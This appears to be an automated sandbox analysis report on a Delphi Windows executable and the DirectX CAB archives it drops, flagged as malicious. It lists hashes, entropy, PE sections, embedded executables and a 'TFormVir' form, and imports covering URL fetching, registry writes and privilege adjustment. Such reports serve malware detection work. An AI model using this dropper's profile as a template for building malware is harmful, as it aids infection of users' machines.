                                                                                              Preview:MSCF.....q......D...............v ...........q...#...................(.........6.. .d3dx9_34_x64.cat.h.D..(.....6.. .d3dx9_34.dll.h.....D....6.. .infinst.exe.....h.E....6.. .d3dx9_34_x64.inf.......E....6.. .d3dx9_34_x64_xp.inf.,.....E....6.. .jun2007_d3dx9_34_x64.inf.....D...[...S ..uM....5!.f...O.....c.F...7..FA,...Jtc.kn$..P..R..Z.$.J.U#!.TJR)..1.!..@C3.........=.G..{#t.,..7V.uh..8..R...9I-d.X...W.vr..V+}NjE...S...pq.l...)V..,Q6..x.Hb.>9XoA.R.=..v......`.4.3...[f)...`.../........Q..........m...{.y2.u.....m.....}2.r.nF.......c0 ...KI.&sD..YD.2.`0...&....x..~......<$bS.l...C..B...~_...~s....V....)+H..!.....G.p..1...Rn<...=.$.SY.W...=..s..{.7%-.qUs.2..IZI)_(I^.%.....0.w8..~.8.....B..b...Sh...=y3....(I]...L....iF<..{oD.......%...8..S.^.$.E..f..P.....d...l..$...O...G.G&............)I..........I.&...8&....wd.RL..B'..*..phbG..B...ED..0..8....M....N..$..*%-..u.k.KS4...Gd.Z..r...SRJI.V........&?4./)..I.|B.I.I....A...I....1..;.+...9.}.?..c...u.3.].T.~j..$1v./_
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 693084 bytes, 7 files, at 0x44 +A "d3dx10_34_x64.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 10180, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):702252
                                                                                              Entropy (8bit):7.999542751209748
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:8B7y3n2GQi70ZEqAEToKVkDYK96luRC/Qwrkxb0b9fhXNkVkN2t3r1:8BO/j0ZWET/isK96luRC/jk49JN2t71
                                                                                              MD5:1AB35D11274D1ADBD316B19C44B9AE41
                                                                                              SHA1:14165EC367CE179588C8A5806FC968FDB49B4ACA
                                                                                              SHA-256:02ED1B5A850EDB52EC174DE177E91842EDC7C5F4C06CEDA5B16F3427DBCD4C99
                                                                                              SHA-512:71C8FAC7C95211D323C4FB6A02916E7D43EE399BBE0F1D983B5AC210F5039B23355F40B36F023F3C36E19787E2871A60CC389E51D6327652CD84D9E3B93D5A4D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....\.......D................'..........\....#..........4...=....).........6.. .d3dx10_34_x64.cat.pa...).....6.. .d3dcompiler_34.dll.h...2......6.. .d3dx10_34.dll.h....F.....6.. .infinst.exe......X.....6.. .d3dx10_34_x64.inf......Z.....6.. .d3dx10_34_x64_xp.inf./....\.....6.. .jun2007_d3dx10_34_x64.inf.........[.....p...R.P...>..s+..A.%..".J8.Z....B.Z......VR.!B.T%AP..H...1....0..~_.Z./_y.l.u....`..[r-..d.wj....B^.QrAc..-../?.....".......A....P4DP{....|.d.t..4.}.W58Ah)...TNRt......2$.....r..q .^...1....... .. 3..*.......|.J..=....N.KB|.{.J...W..1O....Z4...@H...T..p....0}.A...q..-B...I.($.J.K~..G.$..y....8.`$w@|..FO.Km.....#/.P4..3 P..by...e......O....(...]..P>(o..?...#t....P....?b/..(.............g.F*....|T.XPw.P..I.4..x..&PZ.C|8o......8I/..p.....K.(.'a...t.....A~.<.7.9.'...'.....O.p<EO......F.E........e...A{.@=.e...:..y.J......F.z...].......G..{...~z@...S$....'....p}..'......(#..(.......;.~.....hyXVfA............'h....nj.R.p,h........W......G.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 146949 bytes, 6 files, at 0x44 +A "xact2_8_x86.cat" +A "x3daudio1_2.dll", flags 0x4, ID 9016, number 1, extra bytes 20 in head, 10 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):156117
                                                                                              Entropy (8bit):7.994909703055095
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tG7RXkNHRrOaYVD5yEThWmLksx2MeEm6oOD4+3y20OXtGhlYRTPZDT5P/lJXptA:eX8KVD5yETfLksAMUHo4+T5IhlYRDZDy
                                                                                              MD5:001CFF513A31EE082133E7BA3B0D71A2
                                                                                              SHA1:4517610A25239A16C26CA9890E1F0E52DDA3781A
                                                                                              SHA-256:245B0C554CBE2677939A70E5C4C6666B1B43D10D47980223F8CDEADB2D0EB76B
                                                                                              SHA-512:7119F6CA16FE6D968310F34828F30D8144531B89583CFD529056D2E31D5164FC65136FA9015B69849F724EC641A9291AC644C91CC3FA8EBDD4DAF9CF5A665A7F
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....>......D...............8#...........>...#...................).........6.. .xact2_8_x86.cat.hG...).....6.. .x3daudio1_2.dll.h...*q.....6. .xactengine2_8.dll.o..........6.. .jun2007_xact_x86.inf............6.. .xact2_8_x86.inf............6.. .xact2_8_x86_xp.inf......4..CK.|.@S..I..........c....B(..........A..{..b...;XA.`.r,...Q..l.gO@.|....w....svw........8........:.~P.t..d.....T..+GIQah7......_WT..H.S2.)...R@..0...L...R+.;..=.....\.).Y.K.c.1..q.M.&.c9.:.S.WZ.'.b@.2.....q..].1!.F.=.`v.)..9.....1y...&P.....,IN.f.q...}8*.......p......... .~...;.8.'...PC...L...F....F.R1N.1....8...I..*.FU((........X(...bQ.......G.......O...`lj..F.l.>..AS.t/s._.!..{Rv!\MArc.DR.AZ.P....=`..{....-j..!M]..0.o.'gX.L..R..:...k<-.....p.......... .1)....m3.).._1..K.R7.@n.7.......0&d.....,..a.L.I,...?..>..F..8l.....=7Gr?.*.`../...!.9...0o,.s.^I.QT:..Q.t.........D.IR...b,..V[..M....j.....?.I.$..w`.#..\....B.aX{.C....V7.P7.P..P.$..V....AL..I.X@.R.TU.......^.k..{..|...:..8.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191162 bytes, 7 files, at 0x44 +A "xact2_8_x64.cat" +A "x3daudio1_2.dll", flags 0x4, ID 10131, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200354
                                                                                              Entropy (8bit):7.996324633982409
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:Oxuwfa4lebkGyR+DPZLOYZ9lD7baC+PJEDzfYPO6quXhBhYDLk0siPnJ8WKKiu:Oja4WkNWOYxX1+++vRB200ssJ8G
                                                                                              MD5:B9648D12DF695290BE0479C1E78894C7
                                                                                              SHA1:932627D40A83411F9F4006792ADEEB4C3A74CF37
                                                                                              SHA-256:3F2CA0ACCEF2594FB014296F4111B7FBB59729C5D928B22F7283C392494FEE7C
                                                                                              SHA-512:240B622B02C5FA3D036043ECBE5BF29FEE447147AF36E795BFAE83FAFA35934FC22A3E9CC2D846BD880D7808897355E16696C555146EE69864472D4600AD25B6
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........*........).........6.. .xact2_8_x64.cat.hS...).....6.. .x3daudio1_2.dll.hA..*}.....6". .xactengine2_8.dll.h..........6.. .infinst.exe............6.. .jun2007_xact_x64.inf............6.. .xact2_8_x64.inf.%..........6.. .xact2_8_x64_xp.inf.g@../..[.........R.P...?...XZ.R+...k...h...T.N.B..)...HX.F...J.V..Ty......hD......}.Q.I..lb...^.+..v.;.U.F..i.-.....4........B.$._H...@`................P..7.....,$0...Z/...1+.#.*......tAK.....^.$:.. .G..ma.....B.:<Lv!..p....I...a.A.C$.:....I..$?..I8T-u....o......1,"(CA.....!.(I@.yB......W..@.<3.!.(....1u!........@..y<....@d....2?I..d.ax.....@..WA.2..\....S...z........8.|..'......yD.y...............A'$..A(8.H3'S.#>.P...@..f.8....._..`...(f.'?T....Q..Y.Y.Es..............u(..@...'..zu ...?."(.v.. .=..p%.~..X.;.........g.......+...O...P\\....Y....~H......yd....u.v~y .... .z.B.*...0...! "..b7/..v..J...{...A...~.!y..O=...sR.Uy..>..$L$0.&2`.p..2M.v} p'l...*.....w....'..}.
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.037746245684915
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 93.21%
                                                                                              • Win32 Executable Borland Delphi 7 (665061/41) 6.20%
                                                                                              • InstallShield setup (43055/19) 0.40%
                                                                                              • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                              File name:file.exe
                                                                                              File size:1'059'840 bytes
                                                                                              MD5:eaba5b2c3b6607177112ec5f26438ba3
                                                                                              SHA1:d0572bad54faca6af612763c6835feb160a3dcd2
                                                                                              SHA256:43555b4a8bd82abd7e7b1f279b4f31afb5a230ce4246be6fda4fdd5e7263c780
                                                                                              SHA512:b767a6f167a0153628ae0bdb468eef4d4311e48a58ff4774843ee36321c48823a24be5c9d0d399800a19733a46ead5109cd54e728e6a260107212647a5f60d9c
                                                                                              SSDEEP:24576:6nsJ39LyjbJkQFMhmC+6GD9DukDF4zARUwSp:6nsHyjtk2MYC5GDFuRzmUd
                                                                                              TLSH:23359E22F2D18437D1721B3C9CAB93A5583ABE512E387A4E7BF91D4C4E3968178253D3
                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                              Icon Hash:878fd7f3b9353593
                                                                                              Entrypoint:0x49ab80
                                                                                              Entrypoint Section:CODE
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              add esp, FFFFFFF0h
                                                                                              mov eax, 0049A778h
                                                                                              call 00007F15DC78661Dh
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007F15DC7D9F65h
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, 0049ABE0h
                                                                                              call 00007F15DC7D9B64h
                                                                                              mov ecx, dword ptr [0049DBDCh]
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, dword ptr [00496590h]
                                                                                              call 00007F15DC7D9F54h
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007F15DC7D9FC8h
                                                                                              call 00007F15DC7840FBh
                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x58288 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x58288 | 0x58400 | c857884e8c6f99827f033b83788aea21 | False | 0.7942938872167139 | data | 7.438111819013504 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.07223264540337711
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6
RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286
RT_STRING | 0xb7f50 | 0xbc | data | | | 0.526595744680851
RT_STRING | 0xb800c | 0x368 | data | | | 0.40940366972477066
RT_STRING | 0xb8374 | 0x3fc | data | | | 0.34901960784313724
RT_STRING | 0xb8770 | 0x2fc | data | | | 0.36649214659685864
RT_STRING | 0xb8a6c | 0x354 | data | | | 0.31572769953051644
RT_RCDATA | 0xb8dc0 | 0x44 | data | | | 0.8676470588235294
RT_RCDATA | 0xb8e04 | 0x10 | data | | | 1.5
RT_RCDATA | 0xb8e14 | 0x46558 | PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive | | | 0.8737573241509539
RT_RCDATA | 0xff36c | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
RT_RCDATA | 0xff370 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
RT_RCDATA | 0x102f70 | 0x64c | data | | | 0.5998759305210918
RT_RCDATA | 0x1035bc | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309
RT_RCDATA | 0x103710 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
RT_GROUP_CURSOR | 0x107ee4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x107ef8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x107f0c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x107f20 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x107f34 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x107f48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x107f5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x107f70 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0x107f84 | 0x304 | data | Turkish | Turkey | 0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll | CLSIDFromString
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ShellExecuteExA, ExtractIconExW
wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll | OpenSCManagerA, CloseServiceHandle
wsock32.dll | WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll | Netbios
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
